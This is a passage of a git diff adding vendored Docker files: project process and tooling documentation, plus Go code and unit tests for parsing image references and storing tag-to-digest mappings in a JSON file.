+ +## Escalation process + +Despite the previously described reviewing process, some PR might not show any progress for various +reasons: + + - No strong opinion for or against the proposed patch + - Debates about the proper way to solve the problem at hand + - Lack of consensus + - ... + +All these will eventually lead to stalled PR, where no apparent progress is made across several +weeks, or even months. + +Maintainers should use their best judgement and apply the `status/needs-attention` label. It must +be used sparingly, as each PR with such label will be discussed by a group of maintainers during a +review session. The goal of that session is to agree on one of the following outcomes for the PR: + + * Close, explaining the rationale for not pursuing further + * Continue, either by pushing the PR further in the workflow, or by deciding to carry the patch + (ideally, a maintainer should be immediately assigned to make sure that the PR keeps continued + attention) + * Escalate to Solomon by formulating a few specific questions on which his answers will allow + maintainers to decide. + +## Milestones + +Typically, every merged pull request get shipped naturally with the next release cut from the +`master` branch (either the next minor or major version, as indicated by the +[`VERSION`](https://github.com/docker/docker/blob/master/VERSION) file at the root of the +repository). However, the time-based nature of the release process provides no guarantee that a +given pull request will get merged in time. In other words, all open pull requests are implicitly +considered part of the next minor or major release milestone, and this won't be materialized on +GitHub. + +A merged pull request must be attached to the milestone corresponding to the release in which it +will be shipped: this is both useful for tracking, and to help the release manager with the +changelog generation. 
+ +An open pull request may exceptionally get attached to a milestone to express a particular intent to +get it merged in time for that release. This may for example be the case for an important feature to +be included in a minor release, or a critical bugfix to be included in a patch release. + +Finally, and as documented by the [`PATCH-RELEASES.md`](PATCH-RELEASES.md) process, the existence of +a milestone is not a guarantee that a release will happen, as some milestones will be created purely +for the purpose of bookkeeping diff --git a/vendor/github.com/docker/docker/project/TOOLS.md b/vendor/github.com/docker/docker/project/TOOLS.md new file mode 100644 index 0000000000..26303c3021 --- /dev/null +++ b/vendor/github.com/docker/docker/project/TOOLS.md @@ -0,0 +1,63 @@ +# Tools + +This page describes the tools we use and infrastructure that is in place for +the Docker project. + +### CI + +The Docker project uses [Jenkins](https://jenkins.dockerproject.org/) as our +continuous integration server. Each Pull Request to Docker is tested by running the +equivalent of `make all`. We chose Jenkins because we can host it ourselves and +we run Docker in Docker to test. + +#### Leeroy + +Leeroy is a Go application which integrates Jenkins with +GitHub pull requests. Leeroy uses +[GitHub hooks](https://developer.github.com/v3/repos/hooks/) +to listen for pull request notifications and starts jobs on your Jenkins +server. Using the Jenkins +[notification plugin][https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin], +Leeroy updates the pull request using GitHub's +[status API](https://developer.github.com/v3/repos/statuses/) +with pending, success, failure, or error statuses. + +The leeroy repository is maintained at +[github.com/docker/leeroy](https://github.com/docker/leeroy). + +#### GordonTheTurtle IRC Bot + +The GordonTheTurtle IRC Bot lives in the +[#docker-maintainers](https://botbot.me/freenode/docker-maintainers/) channel +on Freenode. 
He is built in Go and is based off the project at
+[github.com/fabioxgn/go-bot](https://github.com/fabioxgn/go-bot).
+
+His main command is `!rebuild`, which rebuilds a given Pull Request for a repository.
+This command works by integrating with Leeroy. He has a few other commands too, such
+as `!gif` or `!godoc`, but we are always looking for more fun commands to add.
+
+The gordon-bot repository is maintained at
+[github.com/docker/gordon-bot](https://github.com/docker/gordon-bot)
+
+### NSQ
+
+We use [NSQ](https://github.com/bitly/nsq) for various aspects of the project
+infrastructure.
+
+#### Hooks
+
+The hooks project,
+[github.com/crosbymichael/hooks](https://github.com/crosbymichael/hooks),
+is a small Go application that manages web hooks from github, hub.docker.com, or
+other third party services.
+
+It can be used for listening to github webhooks & pushing them to a queue,
+archiving hooks to rethinkdb for processing, and broadcasting hooks to various
+jobs.
+
+#### Docker Master Binaries
+
+One of the things queued from the Hooks is the building of the Master
+Binaries. This happens on every push to the master branch of Docker. The
+repository for this is maintained at
+[github.com/docker/docker-bb](https://github.com/docker/docker-bb).
diff --git a/vendor/github.com/docker/docker/reference/reference.go b/vendor/github.com/docker/docker/reference/reference.go new file mode 100644 index 0000000000..996fc50704 --- /dev/null +++ b/vendor/github.com/docker/docker/reference/reference.go @@ -0,0 +1,216 @@ +package reference + +import ( + "errors" + "fmt" + "strings" + + "github.com/docker/distribution/digest" + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/image/v1" +) + +const ( + // DefaultTag defines the default tag used when performing images related actions and no tag or digest is specified + DefaultTag = "latest" + // DefaultHostname is the default built-in hostname + DefaultHostname = "docker.io" + // LegacyDefaultHostname is automatically converted to DefaultHostname + LegacyDefaultHostname = "index.docker.io" + // DefaultRepoPrefix is the prefix used for default repositories in default host + DefaultRepoPrefix = "library/" +) + +// Named is an object with a full name +type Named interface { + // Name returns normalized repository name, like "ubuntu". + Name() string + // String returns full reference, like "ubuntu@sha256:abcdef..." + String() string + // FullName returns full repository name with hostname, like "docker.io/library/ubuntu" + FullName() string + // Hostname returns hostname for the reference, like "docker.io" + Hostname() string + // RemoteName returns the repository component of the full name, like "library/ubuntu" + RemoteName() string +} + +// NamedTagged is an object including a name and tag. +type NamedTagged interface { + Named + Tag() string +} + +// Canonical reference is an object with a fully unique +// name including a name with hostname and digest +type Canonical interface { + Named + Digest() digest.Digest +} + +// ParseNamed parses s and returns a syntactically valid reference implementing +// the Named interface. The reference must have a name, otherwise an error is +// returned. 
+// If an error was encountered it is returned, along with a nil Reference. +func ParseNamed(s string) (Named, error) { + named, err := distreference.ParseNamed(s) + if err != nil { + return nil, fmt.Errorf("Error parsing reference: %q is not a valid repository/tag: %s", s, err) + } + r, err := WithName(named.Name()) + if err != nil { + return nil, err + } + if canonical, isCanonical := named.(distreference.Canonical); isCanonical { + return WithDigest(r, canonical.Digest()) + } + if tagged, isTagged := named.(distreference.NamedTagged); isTagged { + return WithTag(r, tagged.Tag()) + } + return r, nil +} + +// TrimNamed removes any tag or digest from the named reference +func TrimNamed(ref Named) Named { + return &namedRef{distreference.TrimNamed(ref)} +} + +// WithName returns a named object representing the given string. If the input +// is invalid ErrReferenceInvalidFormat will be returned. +func WithName(name string) (Named, error) { + name, err := normalize(name) + if err != nil { + return nil, err + } + if err := validateName(name); err != nil { + return nil, err + } + r, err := distreference.WithName(name) + if err != nil { + return nil, err + } + return &namedRef{r}, nil +} + +// WithTag combines the name from "name" and the tag from "tag" to form a +// reference incorporating both the name and the tag. +func WithTag(name Named, tag string) (NamedTagged, error) { + r, err := distreference.WithTag(name, tag) + if err != nil { + return nil, err + } + return &taggedRef{namedRef{r}}, nil +} + +// WithDigest combines the name from "name" and the digest from "digest" to form +// a reference incorporating both the name and the digest. 
+func WithDigest(name Named, digest digest.Digest) (Canonical, error) { + r, err := distreference.WithDigest(name, digest) + if err != nil { + return nil, err + } + return &canonicalRef{namedRef{r}}, nil +} + +type namedRef struct { + distreference.Named +} +type taggedRef struct { + namedRef +} +type canonicalRef struct { + namedRef +} + +func (r *namedRef) FullName() string { + hostname, remoteName := splitHostname(r.Name()) + return hostname + "/" + remoteName +} +func (r *namedRef) Hostname() string { + hostname, _ := splitHostname(r.Name()) + return hostname +} +func (r *namedRef) RemoteName() string { + _, remoteName := splitHostname(r.Name()) + return remoteName +} +func (r *taggedRef) Tag() string { + return r.namedRef.Named.(distreference.NamedTagged).Tag() +} +func (r *canonicalRef) Digest() digest.Digest { + return r.namedRef.Named.(distreference.Canonical).Digest() +} + +// WithDefaultTag adds a default tag to a reference if it only has a repo name. +func WithDefaultTag(ref Named) Named { + if IsNameOnly(ref) { + ref, _ = WithTag(ref, DefaultTag) + } + return ref +} + +// IsNameOnly returns true if reference only contains a repo name. +func IsNameOnly(ref Named) bool { + if _, ok := ref.(NamedTagged); ok { + return false + } + if _, ok := ref.(Canonical); ok { + return false + } + return true +} + +// ParseIDOrReference parses string for an image ID or a reference. ID can be +// without a default prefix. +func ParseIDOrReference(idOrRef string) (digest.Digest, Named, error) { + if err := v1.ValidateID(idOrRef); err == nil { + idOrRef = "sha256:" + idOrRef + } + if dgst, err := digest.ParseDigest(idOrRef); err == nil { + return dgst, nil, nil + } + ref, err := ParseNamed(idOrRef) + return "", ref, err +} + +// splitHostname splits a repository name to hostname and remotename string. +// If no valid hostname is found, the default hostname is used. Repository name +// needs to be already validated before. 
+func splitHostname(name string) (hostname, remoteName string) { + i := strings.IndexRune(name, '/') + if i == -1 || (!strings.ContainsAny(name[:i], ".:") && name[:i] != "localhost") { + hostname, remoteName = DefaultHostname, name + } else { + hostname, remoteName = name[:i], name[i+1:] + } + if hostname == LegacyDefaultHostname { + hostname = DefaultHostname + } + if hostname == DefaultHostname && !strings.ContainsRune(remoteName, '/') { + remoteName = DefaultRepoPrefix + remoteName + } + return +} + +// normalize returns a repository name in its normalized form, meaning it +// will not contain default hostname nor library/ prefix for official images. +func normalize(name string) (string, error) { + host, remoteName := splitHostname(name) + if strings.ToLower(remoteName) != remoteName { + return "", errors.New("invalid reference format: repository name must be lowercase") + } + if host == DefaultHostname { + if strings.HasPrefix(remoteName, DefaultRepoPrefix) { + return strings.TrimPrefix(remoteName, DefaultRepoPrefix), nil + } + return remoteName, nil + } + return name, nil +} + +func validateName(name string) error { + if err := v1.ValidateID(name); err == nil { + return fmt.Errorf("Invalid repository name (%s), cannot specify 64-byte hexadecimal strings", name) + } + return nil +} diff --git a/vendor/github.com/docker/docker/reference/reference_test.go b/vendor/github.com/docker/docker/reference/reference_test.go new file mode 100644 index 0000000000..ff35ba3da2 --- /dev/null +++ b/vendor/github.com/docker/docker/reference/reference_test.go @@ -0,0 +1,275 @@ +package reference + +import ( + "testing" + + "github.com/docker/distribution/digest" +) + +func TestValidateReferenceName(t *testing.T) { + validRepoNames := []string{ + "docker/docker", + "library/debian", + "debian", + "docker.io/docker/docker", + "docker.io/library/debian", + "docker.io/debian", + "index.docker.io/docker/docker", + "index.docker.io/library/debian", + "index.docker.io/debian", + 
"127.0.0.1:5000/docker/docker", + "127.0.0.1:5000/library/debian", + "127.0.0.1:5000/debian", + "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", + } + invalidRepoNames := []string{ + "https://github.com/docker/docker", + "docker/Docker", + "-docker", + "-docker/docker", + "-docker.io/docker/docker", + "docker///docker", + "docker.io/docker/Docker", + "docker.io/docker///docker", + "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", + "docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", + } + + for _, name := range invalidRepoNames { + _, err := ParseNamed(name) + if err == nil { + t.Fatalf("Expected invalid repo name for %q", name) + } + } + + for _, name := range validRepoNames { + _, err := ParseNamed(name) + if err != nil { + t.Fatalf("Error parsing repo name %s, got: %q", name, err) + } + } +} + +func TestValidateRemoteName(t *testing.T) { + validRepositoryNames := []string{ + // Sanity check. + "docker/docker", + + // Allow 64-character non-hexadecimal names (hexadecimal names are forbidden). + "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", + + // Allow embedded hyphens. + "docker-rules/docker", + + // Allow multiple hyphens as well. + "docker---rules/docker", + + //Username doc and image name docker being tested. + "doc/docker", + + // single character names are now allowed. + "d/docker", + "jess/t", + + // Consecutive underscores. + "dock__er/docker", + } + for _, repositoryName := range validRepositoryNames { + _, err := ParseNamed(repositoryName) + if err != nil { + t.Errorf("Repository name should be valid: %v. Error: %v", repositoryName, err) + } + } + + invalidRepositoryNames := []string{ + // Disallow capital letters. + "docker/Docker", + + // Only allow one slash. + "docker///docker", + + // Disallow 64-character hexadecimal. + "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", + + // Disallow leading and trailing hyphens in namespace. 
+ "-docker/docker", + "docker-/docker", + "-docker-/docker", + + // Don't allow underscores everywhere (as opposed to hyphens). + "____/____", + + "_docker/_docker", + + // Disallow consecutive periods. + "dock..er/docker", + "dock_.er/docker", + "dock-.er/docker", + + // No repository. + "docker/", + + //namespace too long + "this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker", + } + for _, repositoryName := range invalidRepositoryNames { + if _, err := ParseNamed(repositoryName); err == nil { + t.Errorf("Repository name should be invalid: %v", repositoryName) + } + } +} + +func TestParseRepositoryInfo(t *testing.T) { + type tcase struct { + RemoteName, NormalizedName, FullName, AmbiguousName, Hostname string + } + + tcases := []tcase{ + { + RemoteName: "fooo/bar", + NormalizedName: "fooo/bar", + FullName: "docker.io/fooo/bar", + AmbiguousName: "index.docker.io/fooo/bar", + Hostname: "docker.io", + }, + { + RemoteName: "library/ubuntu", + NormalizedName: "ubuntu", + FullName: "docker.io/library/ubuntu", + AmbiguousName: "library/ubuntu", + Hostname: "docker.io", + }, + { + RemoteName: "nonlibrary/ubuntu", + NormalizedName: "nonlibrary/ubuntu", + FullName: "docker.io/nonlibrary/ubuntu", + AmbiguousName: "", + Hostname: "docker.io", + }, + { + RemoteName: "other/library", + NormalizedName: "other/library", + FullName: "docker.io/other/library", + AmbiguousName: "", + Hostname: "docker.io", + }, + { + RemoteName: "private/moonbase", + NormalizedName: "127.0.0.1:8000/private/moonbase", + FullName: "127.0.0.1:8000/private/moonbase", + AmbiguousName: "", + Hostname: "127.0.0.1:8000", + }, + { + RemoteName: "privatebase", + NormalizedName: "127.0.0.1:8000/privatebase", + FullName: "127.0.0.1:8000/privatebase", + AmbiguousName: "", + Hostname: 
"127.0.0.1:8000", + }, + { + RemoteName: "private/moonbase", + NormalizedName: "example.com/private/moonbase", + FullName: "example.com/private/moonbase", + AmbiguousName: "", + Hostname: "example.com", + }, + { + RemoteName: "privatebase", + NormalizedName: "example.com/privatebase", + FullName: "example.com/privatebase", + AmbiguousName: "", + Hostname: "example.com", + }, + { + RemoteName: "private/moonbase", + NormalizedName: "example.com:8000/private/moonbase", + FullName: "example.com:8000/private/moonbase", + AmbiguousName: "", + Hostname: "example.com:8000", + }, + { + RemoteName: "privatebasee", + NormalizedName: "example.com:8000/privatebasee", + FullName: "example.com:8000/privatebasee", + AmbiguousName: "", + Hostname: "example.com:8000", + }, + { + RemoteName: "library/ubuntu-12.04-base", + NormalizedName: "ubuntu-12.04-base", + FullName: "docker.io/library/ubuntu-12.04-base", + AmbiguousName: "index.docker.io/library/ubuntu-12.04-base", + Hostname: "docker.io", + }, + } + + for _, tcase := range tcases { + refStrings := []string{tcase.NormalizedName, tcase.FullName} + if tcase.AmbiguousName != "" { + refStrings = append(refStrings, tcase.AmbiguousName) + } + + var refs []Named + for _, r := range refStrings { + named, err := ParseNamed(r) + if err != nil { + t.Fatal(err) + } + refs = append(refs, named) + named, err = WithName(r) + if err != nil { + t.Fatal(err) + } + refs = append(refs, named) + } + + for _, r := range refs { + if expected, actual := tcase.NormalizedName, r.Name(); expected != actual { + t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) + } + if expected, actual := tcase.FullName, r.FullName(); expected != actual { + t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) + } + if expected, actual := tcase.Hostname, r.Hostname(); expected != actual { + t.Fatalf("Invalid hostname for %q. 
Expected %q, got %q", r, expected, actual) + } + if expected, actual := tcase.RemoteName, r.RemoteName(); expected != actual { + t.Fatalf("Invalid remoteName for %q. Expected %q, got %q", r, expected, actual) + } + + } + } +} + +func TestParseReferenceWithTagAndDigest(t *testing.T) { + ref, err := ParseNamed("busybox:latest@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa") + if err != nil { + t.Fatal(err) + } + if _, isTagged := ref.(NamedTagged); isTagged { + t.Fatalf("Reference from %q should not support tag", ref) + } + if _, isCanonical := ref.(Canonical); !isCanonical { + t.Fatalf("Reference from %q should not support digest", ref) + } + if expected, actual := "busybox@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa", ref.String(); actual != expected { + t.Fatalf("Invalid parsed reference for %q: expected %q, got %q", ref, expected, actual) + } +} + +func TestInvalidReferenceComponents(t *testing.T) { + if _, err := WithName("-foo"); err == nil { + t.Fatal("Expected WithName to detect invalid name") + } + ref, err := WithName("busybox") + if err != nil { + t.Fatal(err) + } + if _, err := WithTag(ref, "-foo"); err == nil { + t.Fatal("Expected WithName to detect invalid tag") + } + if _, err := WithDigest(ref, digest.Digest("foo")); err == nil { + t.Fatal("Expected WithName to detect invalid digest") + } +} diff --git a/vendor/github.com/docker/docker/reference/store.go b/vendor/github.com/docker/docker/reference/store.go new file mode 100644 index 0000000000..71ca236c9c --- /dev/null +++ b/vendor/github.com/docker/docker/reference/store.go @@ -0,0 +1,286 @@ +package reference + +import ( + "encoding/json" + "errors" + "fmt" + "os" + "path/filepath" + "sort" + "sync" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/ioutils" +) + +var ( + // ErrDoesNotExist is returned if a reference is not found in the + // store. 
+ ErrDoesNotExist = errors.New("reference does not exist") +) + +// An Association is a tuple associating a reference with an image ID. +type Association struct { + Ref Named + ID digest.Digest +} + +// Store provides the set of methods which can operate on a tag store. +type Store interface { + References(id digest.Digest) []Named + ReferencesByName(ref Named) []Association + AddTag(ref Named, id digest.Digest, force bool) error + AddDigest(ref Canonical, id digest.Digest, force bool) error + Delete(ref Named) (bool, error) + Get(ref Named) (digest.Digest, error) +} + +type store struct { + mu sync.RWMutex + // jsonPath is the path to the file where the serialized tag data is + // stored. + jsonPath string + // Repositories is a map of repositories, indexed by name. + Repositories map[string]repository + // referencesByIDCache is a cache of references indexed by ID, to speed + // up References. + referencesByIDCache map[digest.Digest]map[string]Named +} + +// Repository maps tags to digests. The key is a stringified Reference, +// including the repository name. +type repository map[string]digest.Digest + +type lexicalRefs []Named + +func (a lexicalRefs) Len() int { return len(a) } +func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalRefs) Less(i, j int) bool { return a[i].String() < a[j].String() } + +type lexicalAssociations []Association + +func (a lexicalAssociations) Len() int { return len(a) } +func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalAssociations) Less(i, j int) bool { return a[i].Ref.String() < a[j].Ref.String() } + +// NewReferenceStore creates a new reference store, tied to a file path where +// the set of references are serialized in JSON format. 
+func NewReferenceStore(jsonPath string) (Store, error) { + abspath, err := filepath.Abs(jsonPath) + if err != nil { + return nil, err + } + + store := &store{ + jsonPath: abspath, + Repositories: make(map[string]repository), + referencesByIDCache: make(map[digest.Digest]map[string]Named), + } + // Load the json file if it exists, otherwise create it. + if err := store.reload(); os.IsNotExist(err) { + if err := store.save(); err != nil { + return nil, err + } + } else if err != nil { + return nil, err + } + return store, nil +} + +// AddTag adds a tag reference to the store. If force is set to true, existing +// references can be overwritten. This only works for tags, not digests. +func (store *store) AddTag(ref Named, id digest.Digest, force bool) error { + if _, isCanonical := ref.(Canonical); isCanonical { + return errors.New("refusing to create a tag with a digest reference") + } + return store.addReference(WithDefaultTag(ref), id, force) +} + +// AddDigest adds a digest reference to the store. 
+func (store *store) AddDigest(ref Canonical, id digest.Digest, force bool) error { + return store.addReference(ref, id, force) +} + +func (store *store) addReference(ref Named, id digest.Digest, force bool) error { + if ref.Name() == string(digest.Canonical) { + return errors.New("refusing to create an ambiguous tag using digest algorithm as name") + } + + store.mu.Lock() + defer store.mu.Unlock() + + repository, exists := store.Repositories[ref.Name()] + if !exists || repository == nil { + repository = make(map[string]digest.Digest) + store.Repositories[ref.Name()] = repository + } + + refStr := ref.String() + oldID, exists := repository[refStr] + + if exists { + // force only works for tags + if digested, isDigest := ref.(Canonical); isDigest { + return fmt.Errorf("Cannot overwrite digest %s", digested.Digest().String()) + } + + if !force { + return fmt.Errorf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use -f option", ref.String(), oldID.String()) + } + + if store.referencesByIDCache[oldID] != nil { + delete(store.referencesByIDCache[oldID], refStr) + if len(store.referencesByIDCache[oldID]) == 0 { + delete(store.referencesByIDCache, oldID) + } + } + } + + repository[refStr] = id + if store.referencesByIDCache[id] == nil { + store.referencesByIDCache[id] = make(map[string]Named) + } + store.referencesByIDCache[id][refStr] = ref + + return store.save() +} + +// Delete deletes a reference from the store. It returns true if a deletion +// happened, or false otherwise. 
+func (store *store) Delete(ref Named) (bool, error) { + ref = WithDefaultTag(ref) + + store.mu.Lock() + defer store.mu.Unlock() + + repoName := ref.Name() + + repository, exists := store.Repositories[repoName] + if !exists { + return false, ErrDoesNotExist + } + + refStr := ref.String() + if id, exists := repository[refStr]; exists { + delete(repository, refStr) + if len(repository) == 0 { + delete(store.Repositories, repoName) + } + if store.referencesByIDCache[id] != nil { + delete(store.referencesByIDCache[id], refStr) + if len(store.referencesByIDCache[id]) == 0 { + delete(store.referencesByIDCache, id) + } + } + return true, store.save() + } + + return false, ErrDoesNotExist +} + +// Get retrieves an item from the store by reference +func (store *store) Get(ref Named) (digest.Digest, error) { + ref = WithDefaultTag(ref) + + store.mu.RLock() + defer store.mu.RUnlock() + + repository, exists := store.Repositories[ref.Name()] + if !exists || repository == nil { + return "", ErrDoesNotExist + } + + id, exists := repository[ref.String()] + if !exists { + return "", ErrDoesNotExist + } + + return id, nil +} + +// References returns a slice of references to the given ID. The slice +// will be nil if there are no references to this ID. +func (store *store) References(id digest.Digest) []Named { + store.mu.RLock() + defer store.mu.RUnlock() + + // Convert the internal map to an array for two reasons: + // 1) We must not return a mutable + // 2) It would be ugly to expose the extraneous map keys to callers. + + var references []Named + for _, ref := range store.referencesByIDCache[id] { + references = append(references, ref) + } + + sort.Sort(lexicalRefs(references)) + + return references +} + +// ReferencesByName returns the references for a given repository name. +// If there are no references known for this repository name, +// ReferencesByName returns nil. 
+func (store *store) ReferencesByName(ref Named) []Association { + store.mu.RLock() + defer store.mu.RUnlock() + + repository, exists := store.Repositories[ref.Name()] + if !exists { + return nil + } + + var associations []Association + for refStr, refID := range repository { + ref, err := ParseNamed(refStr) + if err != nil { + // Should never happen + return nil + } + associations = append(associations, + Association{ + Ref: ref, + ID: refID, + }) + } + + sort.Sort(lexicalAssociations(associations)) + + return associations +} + +func (store *store) save() error { + // Store the json + jsonData, err := json.Marshal(store) + if err != nil { + return err + } + return ioutils.AtomicWriteFile(store.jsonPath, jsonData, 0600) +} + +func (store *store) reload() error { + f, err := os.Open(store.jsonPath) + if err != nil { + return err + } + defer f.Close() + if err := json.NewDecoder(f).Decode(&store); err != nil { + return err + } + + for _, repository := range store.Repositories { + for refStr, refID := range repository { + ref, err := ParseNamed(refStr) + if err != nil { + // Should never happen + continue + } + if store.referencesByIDCache[refID] == nil { + store.referencesByIDCache[refID] = make(map[string]Named) + } + store.referencesByIDCache[refID][refStr] = ref + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/reference/store_test.go b/vendor/github.com/docker/docker/reference/store_test.go new file mode 100644 index 0000000000..dd1d253d8e --- /dev/null +++ b/vendor/github.com/docker/docker/reference/store_test.go @@ -0,0 +1,356 @@ +package reference + +import ( + "bytes" + "io/ioutil" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/docker/distribution/digest" +) + +var ( + saveLoadTestCases = map[string]digest.Digest{ + "registry:5000/foobar:HEAD": "sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6", + "registry:5000/foobar:alternate": 
"sha256:ae300ebc4a4f00693702cfb0a5e0b7bc527b353828dc86ad09fb95c8a681b793", + "registry:5000/foobar:latest": "sha256:6153498b9ac00968d71b66cca4eac37e990b5f9eb50c26877eb8799c8847451b", + "registry:5000/foobar:master": "sha256:6c9917af4c4e05001b346421959d7ea81b6dc9d25718466a37a6add865dfd7fc", + "jess/hollywood:latest": "sha256:ae7a5519a0a55a2d4ef20ddcbd5d0ca0888a1f7ab806acc8e2a27baf46f529fe", + "registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6": "sha256:24126a56805beb9711be5f4590cc2eb55ab8d4a85ebd618eed72bb19fc50631c", + "busybox:latest": "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + } + + marshalledSaveLoadTestCases = []byte(`{"Repositories":{"busybox":{"busybox:latest":"sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c"},"jess/hollywood":{"jess/hollywood:latest":"sha256:ae7a5519a0a55a2d4ef20ddcbd5d0ca0888a1f7ab806acc8e2a27baf46f529fe"},"registry":{"registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6":"sha256:24126a56805beb9711be5f4590cc2eb55ab8d4a85ebd618eed72bb19fc50631c"},"registry:5000/foobar":{"registry:5000/foobar:HEAD":"sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6","registry:5000/foobar:alternate":"sha256:ae300ebc4a4f00693702cfb0a5e0b7bc527b353828dc86ad09fb95c8a681b793","registry:5000/foobar:latest":"sha256:6153498b9ac00968d71b66cca4eac37e990b5f9eb50c26877eb8799c8847451b","registry:5000/foobar:master":"sha256:6c9917af4c4e05001b346421959d7ea81b6dc9d25718466a37a6add865dfd7fc"}}}`) +) + +func TestLoad(t *testing.T) { + jsonFile, err := ioutil.TempFile("", "tag-store-test") + if err != nil { + t.Fatalf("error creating temp file: %v", err) + } + defer os.RemoveAll(jsonFile.Name()) + + // Write canned json to the temp file + _, err = jsonFile.Write(marshalledSaveLoadTestCases) + if err != nil { + t.Fatalf("error writing to temp file: %v", err) + } + jsonFile.Close() + + store, err := NewReferenceStore(jsonFile.Name()) + if err 
!= nil { + t.Fatalf("error creating tag store: %v", err) + } + + for refStr, expectedID := range saveLoadTestCases { + ref, err := ParseNamed(refStr) + if err != nil { + t.Fatalf("failed to parse reference: %v", err) + } + id, err := store.Get(ref) + if err != nil { + t.Fatalf("could not find reference %s: %v", refStr, err) + } + if id != expectedID { + t.Fatalf("expected %s - got %s", expectedID, id) + } + } +} + +func TestSave(t *testing.T) { + jsonFile, err := ioutil.TempFile("", "tag-store-test") + if err != nil { + t.Fatalf("error creating temp file: %v", err) + } + _, err = jsonFile.Write([]byte(`{}`)) + jsonFile.Close() + defer os.RemoveAll(jsonFile.Name()) + + store, err := NewReferenceStore(jsonFile.Name()) + if err != nil { + t.Fatalf("error creating tag store: %v", err) + } + + for refStr, id := range saveLoadTestCases { + ref, err := ParseNamed(refStr) + if err != nil { + t.Fatalf("failed to parse reference: %v", err) + } + if canonical, ok := ref.(Canonical); ok { + err = store.AddDigest(canonical, id, false) + if err != nil { + t.Fatalf("could not add digest reference %s: %v", refStr, err) + } + } else { + err = store.AddTag(ref, id, false) + if err != nil { + t.Fatalf("could not add reference %s: %v", refStr, err) + } + } + } + + jsonBytes, err := ioutil.ReadFile(jsonFile.Name()) + if err != nil { + t.Fatalf("could not read json file: %v", err) + } + + if !bytes.Equal(jsonBytes, marshalledSaveLoadTestCases) { + t.Fatalf("save output did not match expectations\nexpected:\n%s\ngot:\n%s", marshalledSaveLoadTestCases, jsonBytes) + } +} + +func TestAddDeleteGet(t *testing.T) { + jsonFile, err := ioutil.TempFile("", "tag-store-test") + if err != nil { + t.Fatalf("error creating temp file: %v", err) + } + _, err = jsonFile.Write([]byte(`{}`)) + jsonFile.Close() + defer os.RemoveAll(jsonFile.Name()) + + store, err := NewReferenceStore(jsonFile.Name()) + if err != nil { + t.Fatalf("error creating tag store: %v", err) + } + + testImageID1 := 
digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9c") + testImageID2 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9d") + testImageID3 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9e") + + // Try adding a reference with no tag or digest + nameOnly, err := WithName("username/repo") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(nameOnly, testImageID1, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + // Add a few references + ref1, err := ParseNamed("username/repo1:latest") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref1, testImageID1, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref2, err := ParseNamed("username/repo1:old") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref2, testImageID2, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref3, err := ParseNamed("username/repo1:alias") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref3, testImageID1, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref4, err := ParseNamed("username/repo2:latest") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref4, testImageID2, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref5, err := ParseNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddDigest(ref5.(Canonical), testImageID2, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + // Attempt to overwrite with force == false + if err = store.AddTag(ref4, testImageID3, false); err == nil || 
